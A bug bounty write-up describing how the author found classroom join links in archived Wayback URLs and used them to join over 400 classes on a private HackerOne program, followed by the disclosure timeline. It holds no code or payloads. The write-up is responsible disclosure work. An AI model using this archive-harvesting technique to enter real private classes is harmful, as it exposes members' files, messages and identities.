A bug that made me $250
Hey guys! I’m back with another write-up and this one’s about a bug for which I got awarded $250, so let’s start.
This was a private program on Hackerone and I am not allowed to reveal its name so for that reason I’ll call it REDACTED.
So, upon being invited to this program, I looked at the scope of the program and it had *.redacted.com in scope.
I did some basic sub-domain scanning and fuzzing on its subdomains and till the time these robots are doing their work I started playing with the application functionality.
The application had a functionality by which we can join classes, same as we join classes on Microsoft teams and zoom and there we can see the people who are in that class and the files that are being shared and their text messages and some other information.
I created a class for myself from one account and tried to join the class from another account. To join classes, we have to get a link to join that particular classroom.
“We have to get a link to join that particular classroom” did something click in your mind?
Immediately I went to gather all waybackurls and there I saw that I was able to see links for more than 400+ classes and to my surprise I was able to join most of them.
IMPACT:-
The impact here was that an attacker could join those classes and he would be able to have access to all the information shared there. All the people in that class, files shared and a lot of other stuff and also the attacker can create nuisance in those classes.
TIMELINE:-
Sep 26th (6 months ago): Reported to the program on Hackerone.
Oct 5th (5 months ago): Triaged.
Oct 26th (5 months ago): Response from the program: Hey @yashdharmani — Class codes are considered public and not confidential. Teachers freely share these so people can join their class. There is a feature that they can enable to require approval for each class member to join but it’s not required. See https://help.redacted.com/hc/en-us/articles/36xxxxxxx1xx-Require-approval-to-join-a-class. Basically, it’s the program staff saying it is a feature.
Oct 26th (5 months ago): My response: @asxxxxxx_m Yes, I agree that these are shared freely but in my pov, if an attacker is able to get these codes then he can create nuisance and steal data, I’m presenting the point that I am able to join these classes even though these codes are NOT shared with me. Hope you get my point.
From Oct 26th 2021 till March 12th 2022 I was in conversation with the team and going back and forth explaining to them my point.
Mar 12th 2022: The team accepts the bug and is rewarding me a bounty of $250.
See, sometimes it’s all about being patient and having confidence in yourself and faith in god. This bug took more than 6 months to get accepted by the program and many times I thought of closing the report from my end and thought that it was a dead report but still, I had confidence in myself and knew that it is a valid bug and kept talking back and forth with the team and waiting patiently for the response. Patience is the key.
Thanks for the read guys. See ya around.
Instagram: https://www.instagram.com/yashdharmaniii/
Youtube: https://www.youtube.com/channel/UClD07mxkKSvczsae3uwlX2g
Twitter: https://twitter.com/yashdharmani4
